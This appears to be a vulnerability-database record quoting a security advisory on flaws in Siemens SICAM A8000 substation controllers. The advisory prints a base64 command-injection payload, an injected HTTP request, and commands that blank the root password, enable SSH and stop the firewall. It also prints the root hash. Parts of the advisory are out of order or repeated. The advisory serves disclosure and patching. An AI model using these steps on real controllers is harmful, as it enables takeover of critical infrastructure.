Siemens SICAM A8000 has a command injection vulnerability. The vulnerability stems from the failure of the device to properly filter construction command special characters, commands, etc. SEC Consult Vulnerability Lab Security Advisory < 20230703-0 >
title: Multiple Vulnerabilities including Unauthenticated RCE
product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00)
Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00)
vulnerable version: <= V04.92 fixed version: CPCI85 V05 CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920, CVE-2023-33921 impact: Critical homepage: https://www.siemens.com found: 2023-02-15 by: Stefan Viehböck (Office Vienna) Christian Hager (Office Vienna) Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Gorazd Jank (Office Vienna) Constantin Schieber-Knoebl (Office Vienna) SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
"We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers."
Source: https://new.siemens.com/global/en/company/about.html
Business recommendation:
The vendor provides a patch which should be installed immediately. Customers should update to CPCI85 V05 or later version. (https://support.industry.siemens.com/cs/ww/en/view/109804985/)
SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. The port is used to configure and control Siemens PLCs with the Siemens Toolbox II application and is typically accessible on such devices.
2) Authenticated Command Injection (CVE-2023-33919) Due to missing server-side input sanitation, any user with access to the SICAM WEB interface can execute arbitrary commands as user "root" on the device. This works by setting malicious parameters and starting an Ethernet package capture.
3) Hard-coded Root Password (CVE-2023-33920) The PLC contains a hard-coded "root" user password hash. This password hash is the same on all devices. If the corresponding password is known, it could be used to login via UART and SSH.
4) Console Login via UART (CVE-2023-33921) The UART interface can be accessed with physical access to the PCB. After connecting to the interface, boot information is given and a login prompt is provided. Login as "root" user is possible after changing the hard-coded "root" password hash (see 1,2, and 3). No "/" characters can be used, therefore commands are encoded as base64, e.g., "id" as "aWQ=". The command must be provided as UPLOADFILENAME header. A full command looks as follows:
;echo aWQ=| base64 -d | sh #
The following header format must be obeyed: * User-Agent: SICAM TOOLBOX II * Session-ID: [ARBITRARY 16 CHARACTERS] * UPLOADFILENAME: [COMMAND]
Additionally, the request body must contain the following POST parameters: * type=20 * length=[ARBITRARY] * data=[ARBITRARY]
A valid request can be seen below:
[ POC request removed ]
If it worked, the response body will be "type=21". Additionally, the output on the UART interface indicates code execution as root user:
base64: /ies/IN/_: No such file or directory uid=0(root) gid=0(root)
Subsequently, the SSH port can be opened by sending the following commands separately and encoded as base64 string. They will replace the set default root password hash with an empty password hash, reconfigure the Dropbear SSH daemon and stop the firewall:
sed -i s'/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:/:32BZgrJ3XBMoY:/' /etc/shadow sed -i s'/"$DROPBEAR_ARGS -R -s -g"/"$DROPBEAR_ARGS -R"/' /etc/init.d/dropbear /etc/init.d/dropbear restart /etc/init.d/rc.firewall stop
After this, login via SSH as root is possible:
ssh root@[IP] root@[IP]'s password: ~# id uid=0(root) gid=0(root) groups=0(root),10(wheel) ~#
2) Authenticated Command Injection (CVE-2023-33919) To trigger the command injection vulnerability, the payload must be set in the "LAN port group" field on the SICAM WEB page "Monitoring & Simulation" -> "Ethernet Packet Capture" section "Capture configuration" (other fields may also be affected). As the web interface only provides a drop-down menu, the payload must be set by manipulating the JavaScript logic or by directly manipulating the HTTP request as below, where "ping [IP]\nBBBBBBB" was set:
POST /sicweb-ajax/rtum85/cview HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/xml SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT Content-Length: 198 Origin: http://[HOST] Connection: close Referer: http://[HOST]/
ping [IP] BBBBBBB
The line break in the payload is especially important, as the command is executed as part of a shell script. This script is generated and executed by pressing the "Start/Stop trace" button in the "Capture Controlling" section and saved as /tmp/incws_tcpdump.sh. An excerpt with the injected command is shown below:
[...] # lets start tcpdump tcpdump -i ping [IP] BBBBBBB '(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)' -C 1 -W 4 -U -w /var/log/wireshark.pcap & [...]
The executed script creates a process running as root user, which can be seen by running "ps" on the device:
root 1100 0.0 0.1 1784 1168 ? S Feb21 0:00 /bin/sh /etc/init.d/rc.sysinit root 1149 0.1 0.3 11768 1748 ? S1 Feb21 6:03 _ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json [...] www-data 1487 0.0 0.6 7568 3444 ? S Feb21 0:40 _ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf root 10655 0.0 0.2 1880 1344 ? S 04:55 0:00 _ /bin/sh /tmp/incws_tcpdump.sh root 10667 0.0 0.2 1884 1360 ? S 04:57 0:00 _ ping [IP]
3) Hard-coded Root Password (CVE-2023-33920) A hard-coded "root" user password hash can be found in the /etc/shadow file:
root:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:16436:0:99999:7:::
4) Console Login via UART (CVE-2023-33921) The serial console (UART) can be accessed on the backside of the PCB on two Vias. After removing an additional logic IC, receiving data and sending data is possible with the following UART settings: * Voltage: 3.3V * Speed: 115200 Baud * Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1) Extensive boot log output can be received. Some output is shown below:
U-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02) BOARD : Altera SOCFPGA Cyclone V Board CLOCK: EOSC1 clock 50000 KHz [...] Starting IES system
Welcome to SICAM IES
Welcome to
_. __ __ ___ . ___.
/ || | / | / \ | \/ |
| (----| | | ,----' / ^ \ | \ / |
\ \ | | | | / /_\ \ | |\/| |
.----) | | | |----./ _ \ | | | |
|_/ || __// _\ || || RTUs
[...] sicam login:
Additionally, a console login form is displayed. Login is possible if the password for the set "root" user password hash (see 3) is known.
Vulnerable / tested versions:
The following product has been tested: * Siemens A8000 CP-8050 04.92 * Siemens A8000 CP-8031 04.92
Vendor contact timeline:
2023-03-14: Contacting vendor through productcert@siemens.com, sending encrypted advisory 2023-03-29: Naming researchers involved 2023-03-31: Requesting state. Vulnerability 1 will be published first due to criticality. Rest will follow. 2023-07-03: Release of security advisory.
Solution:
Update to firmware CPCI85 V05 or later version, see vendor advisory for further information: https://cert-portal.siemens.com/productcert/html/ssa-472454.html https://cert-portal.siemens.com/productcert/html/ssa-731916.html
Workaround:
Restrict network access to the A8000 CP-8050/CP8031 module or disable the Toolbox II communication on port 80/443. Make sure to strictly limit physical access to the PLC during and also after its life cycle.
Advisory URL:
https://sec-consult.com/vulnerability-lab/
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult
EOF Stefan Viehböck, Christian Hager, Steffen Robertz, Gerhard Hechenberger, Gorazd Jank, Constantin Schieber-Knoebl / @2023
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202304-0672",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cp-8050",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "cpci85_v05"
},
{
"model": "cp-8031",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "cpci85_v05"
},
{
"model": "cp-8031",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
"version": null
},
{
"model": "cp-8050",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
"version": null
},
{
"model": "sicam a8000 cp-8031 \u003ccpci85",
"scope": "eq",
"trust": 0.6,
"vendor": "siemens",
"version": "v05"
},
{
"model": "sicam a8000 cp-8050 \u003ccpci85",
"scope": "eq",
"trust": 0.6,
"vendor": "siemens",
"version": "v05"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-29699"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-006563"
},
{
"db": "NVD",
"id": "CVE-2023-28489"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:siemens:cp-8031_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "cpci85_v05",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:siemens:cp-8031:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:siemens:cp-8050_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "cpci85_v05",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:siemens:cp-8050:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-28489"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Gerhard Hechenberger, Steffen Robertz, Constantin Schieber-Knoebl, Stefan Viehbock, Gorazd Jank, Christian Hager",
"sources": [
{
"db": "PACKETSTORM",
"id": "173370"
}
],
"trust": 0.1
},
"cve": "CVE-2023-28489",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2023-29699",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-28489",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-28489",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "productcert@siemens.com",
"id": "CVE-2023-28489",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2023-29699",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202304-721",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-29699"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-006563"
},
{
"db": "NVD",
"id": "CVE-2023-28489"
},
{
"db": "NVD",
"id": "CVE-2023-28489"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-721"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \u201cRemote Operation\u201d is enabled. The parameter is disabled by default. \r\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device. Siemens\u0027 cp-8031 firmware and cp-8050 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Siemens SICAM A8000 is a protection and separation control unit for relay protection and substation environment developed by Germany\u0027s Siemens. \n\r\n\r\nSiemens SICAM A8000 has a command injection vulnerability. The vulnerability stems from the failure of the device to properly filter construction command special characters, commands, etc. SEC Consult Vulnerability Lab Security Advisory \u003c 20230703-0 \u003e\n=======================================================================\n title: Multiple Vulnerabilities including Unauthenticated RCE\n product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00)\n Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00)\n vulnerable version: \u003c= V04.92\n fixed version: CPCI85 V05\n CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920,\n CVE-2023-33921\n impact: Critical\n homepage: https://www.siemens.com\n found: 2023-02-15\n by: Stefan Viehb\u00f6ck (Office Vienna)\n Christian Hager (Office Vienna)\n Steffen Robertz (Office Vienna)\n Gerhard Hechenberger (Office Vienna)\n Gorazd Jank (Office Vienna)\n Constantin Schieber-Knoebl (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Eviden business\n Europe | Asia\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"We are a technology company focused on industry, infrastructure,\ntransport, and healthcare. From more resource-efficient factories,\nresilient supply chains, and smarter buildings and grids, to cleaner\nand more comfortable transportation as well as advanced healthcare,\nwe create technology with purpose adding real value for customers.\"\n\nSource: https://new.siemens.com/global/en/company/about.html\n\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patch which should be installed immediately. \nCustomers should update to CPCI85 V05 or later version. \n(https://support.industry.siemens.com/cs/ww/en/view/109804985/)\n\nSEC Consult highly recommends to perform a thorough security review of\nthe product conducted by security professionals to identify and resolve\npotential further security issues. The port\nis used to configure and control Siemens PLCs with the Siemens\nToolbox II application and is typically accessible on such devices. \n\n2) Authenticated Command Injection (CVE-2023-33919)\nDue to missing server-side input sanitation, any user with access to\nthe SICAM WEB interface can execute arbitrary commands as user \"root\"\non the device. This works by setting malicious parameters and starting\nan Ethernet package capture. \n\n3) Hard-coded Root Password (CVE-2023-33920)\nThe PLC contains a hard-coded \"root\" user password hash. This\npassword hash is the same on all devices. If the corresponding\npassword is known, it could be used to login via UART and SSH. \n\n4) Console Login via UART (CVE-2023-33921)\nThe UART interface can be accessed with physical access to the PCB. \nAfter connecting to the interface, boot information is given and a\nlogin prompt is provided. Login as \"root\" user is possible after\nchanging the hard-coded \"root\" password hash (see 1,2, and 3). No \"/\" characters can be used, therefore commands\nare encoded as base64, e.g., \"id\" as \"aWQ=\". The command must be\nprovided as UPLOADFILENAME header. A full command looks as follows:\n\n;echo aWQ=| base64 -d | sh #\n\nThe following header format must be obeyed:\n* User-Agent: SICAM TOOLBOX II\n* Session-ID: [ARBITRARY 16 CHARACTERS]\n* UPLOADFILENAME: [COMMAND]\n\nAdditionally, the request body must contain the following POST parameters:\n* type=20\n* length=[ARBITRARY]\n* data=[ARBITRARY]\n\nA valid request can be seen below:\n-----------------------------------------------------------------------\n[ POC request removed ]\n-----------------------------------------------------------------------\n\nIf it worked, the response body will be \"type=21\". Additionally, the\noutput on the UART interface indicates code execution as root user:\n-----------------------------------------------------------------------\nbase64: /ies/IN/_: No such file or directory\nuid=0(root) gid=0(root)\n-----------------------------------------------------------------------\n\nSubsequently, the SSH port can be opened by sending the following\ncommands separately and encoded as base64 string. They will replace\nthe set default root password hash with an empty password hash,\nreconfigure the Dropbear SSH daemon and stop the firewall:\n-----------------------------------------------------------------------\nsed -i\ns\u0027/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\\/FWtDljQjCbm6JnZqxiMg\nre5P14Kv2zAH1:/:32BZgrJ3XBMoY:/\u0027 /etc/shadow\nsed -i s\u0027/\"$DROPBEAR_ARGS -R -s -g\"/\"$DROPBEAR_ARGS -R\"/\u0027 /etc/init.d/dropbear\n/etc/init.d/dropbear restart\n/etc/init.d/rc.firewall stop\n-----------------------------------------------------------------------\n\nAfter this, login via SSH as root is possible:\n-----------------------------------------------------------------------\nssh root@[IP]\nroot@[IP]\u0027s password:\n~# id\nuid=0(root) gid=0(root) groups=0(root),10(wheel)\n~#\n-----------------------------------------------------------------------\n\n\n2) Authenticated Command Injection (CVE-2023-33919)\nTo trigger the command injection vulnerability, the payload must be set in\nthe \"LAN port group\" field on the SICAM WEB page \"Monitoring \u0026 Simulation\"\n-\u003e \"Ethernet Packet Capture\" section \"Capture configuration\"\n(other fields may also be affected). \nAs the web interface only provides a drop-down menu, the payload must\nbe set by manipulating the JavaScript logic or by directly manipulating\nthe HTTP request as below, where \"ping [IP]\\nBBBBBBB\" was set:\n\n-----------------------------------------------------------------------\nPOST /sicweb-ajax/rtum85/cview HTTP/1.1\nHost: [HOST]\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/xml\nSICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT\nContent-Length: 198\nOrigin: http://[HOST]\nConnection: close\nReferer: http://[HOST]/\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cCmd_SetCustomViewValue\u003e\u003cview id=\"packet_capture\"\u003e\u003cparameter id=\"p0\"\u003e\n\u003cvalue\u003e\nping [IP]\nBBBBBBB\u003c/value\u003e\n\u003c/parameter\u003e\u003c/view\u003e\u003c/Cmd_SetCustomViewValue\u003e\n-----------------------------------------------------------------------\n\nThe line break in the payload is especially important, as the command is\nexecuted as part of a shell script. \nThis script is generated and executed by pressing the \"Start/Stop trace\"\nbutton in the \"Capture Controlling\" section and saved as\n/tmp/incws_tcpdump.sh. An excerpt with the injected command is shown\nbelow:\n\n-----------------------------------------------------------------------\n[...] # lets start tcpdump\ntcpdump -i\nping [IP] BBBBBBB \u0027(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)\u0027 -C 1 -W 4 -U -w /var/log/wireshark.pcap \u0026\n[...]\n-----------------------------------------------------------------------\n\nThe executed script creates a process running as root user, which can\nbe seen by running \"ps\" on the device:\n\n-----------------------------------------------------------------------\nroot 1100 0.0 0.1 1784 1168 ? S Feb21 0:00 /bin/sh /etc/init.d/rc.sysinit\nroot 1149 0.1 0.3 11768 1748 ? S1 Feb21 6:03 \\_ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json\n[...]\nwww-data 1487 0.0 0.6 7568 3444 ? S Feb21 0:40 \\_ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf\nroot 10655 0.0 0.2 1880 1344 ? S 04:55 0:00 \\_ /bin/sh /tmp/incws_tcpdump.sh\nroot 10667 0.0 0.2 1884 1360 ? S 04:57 0:00 \\_ ping [IP]\n-----------------------------------------------------------------------\n\n\n3) Hard-coded Root Password (CVE-2023-33920)\nA hard-coded \"root\" user password hash can be found in the /etc/shadow\nfile:\n-----------------------------------------------------------------------\nroot:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo/FWtDljQjCbm6JnZqxiMg\nre5P14Kv2zAH1:16436:0:99999:7:::\n-----------------------------------------------------------------------\n\n\n4) Console Login via UART (CVE-2023-33921)\nThe serial console (UART) can be accessed on the backside of the PCB\non two Vias. After removing an additional logic IC, receiving data and\nsending data is possible with the following UART settings:\n* Voltage: 3.3V\n* Speed: 115200 Baud\n* Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1)\nExtensive boot log output can be received. Some output is shown below:\n-----------------------------------------------------------------------\nU-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02)\nBOARD : Altera SOCFPGA Cyclone V Board\nCLOCK: EOSC1 clock 50000 KHz\n[...]\nStarting IES system\n-----------------------------------\nWelcome to SICAM IES\n-----------------------------------\n\nWelcome to\n _______. __ ______ ___ .___ ___. \n / || | / | / \\ | \\/ |\n | (----`| | | ,----\u0027 / ^ \\ | \\ / |\n \\ \\ | | | | / /_\\ \\ | |\\/| |\n.----) | | | | `----./ _____ \\ | | | |\n|_______/ |__| \\______/__/ \\__\\ |__| |__| RTUs\n\n[...]\nsicam login:\n-----------------------------------------------------------------------\n\nAdditionally, a console login form is displayed. Login is possible if\nthe password for the set \"root\" user password hash (see 3) is known. \n\n\nVulnerable / tested versions:\n-----------------------------\nThe following product has been tested:\n* Siemens A8000 CP-8050 04.92\n* Siemens A8000 CP-8031 04.92\n\n\nVendor contact timeline:\n------------------------\n2023-03-14: Contacting vendor through productcert@siemens.com, sending\n encrypted advisory\n2023-03-29: Naming researchers involved\n2023-03-31: Requesting state. Vulnerability 1 will be published first\n due to criticality. Rest will follow. \n2023-07-03: Release of security advisory. \n\n\nSolution:\n---------\nUpdate to firmware CPCI85 V05 or later version, see vendor advisory\nfor further information:\nhttps://cert-portal.siemens.com/productcert/html/ssa-472454.html\nhttps://cert-portal.siemens.com/productcert/html/ssa-731916.html\n\n\nWorkaround:\n-----------\nRestrict network access to the A8000 CP-8050/CP8031 module or disable the\nToolbox II communication on port 80/443. Make sure to strictly limit\nphysical access to the PLC during and also after its life cycle. \n\n\nAdvisory URL:\n-------------\nhttps://sec-consult.com/vulnerability-lab/\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSEC Consult Vulnerability Lab\nAn integrated part of SEC Consult, an Eviden business\nEurope | Asia\n\nAbout SEC Consult Vulnerability Lab\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an\nEviden business. It ensures the continued knowledge gain of SEC Consult in the\nfield of network and application security to stay ahead of the attacker. The\nSEC Consult Vulnerability Lab supports high-quality penetration testing and\nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities\nand valid recommendation about the risk profile of new technologies. \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nInterested to work with the experts of SEC Consult?\nSend us your application https://sec-consult.com/career/\n\nInterested in improving your cyber security with the experts of SEC Consult?\nContact our local offices https://sec-consult.com/contact/\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMail: security-research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF Stefan Viehb\u00f6ck, Christian Hager, Steffen Robertz, Gerhard Hechenberger,\nGorazd Jank, Constantin Schieber-Knoebl / @2023\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-28489"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-006563"
},
{
"db": "CNVD",
"id": "CNVD-2023-29699"
},
{
"db": "PACKETSTORM",
"id": "173370"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-28489",
"trust": 3.9
},
{
"db": "PACKETSTORM",
"id": "173370",
"trust": 2.5
},
{
"db": "SIEMENS",
"id": "SSA-472454",
"trust": 2.5
},
{
"db": "JVN",
"id": "JVNVU94715153",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-23-103-07",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-006563",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2023-29699",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.2157",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202304-721",
"trust": 0.6
},
{
"db": "SIEMENS",
"id": "SSA-731916",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-29699"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-006563"
},
{
"db": "PACKETSTORM",
"id": "173370"
},
{
"db": "NVD",
"id": "CVE-2023-28489"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-721"
}
]
},
"id": "VAR-202304-0672",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-29699"
}
],
"trust": 1.2180555499999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-29699"
}
]
},
"last_update_date": "2023-12-18T11:20:11.050000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
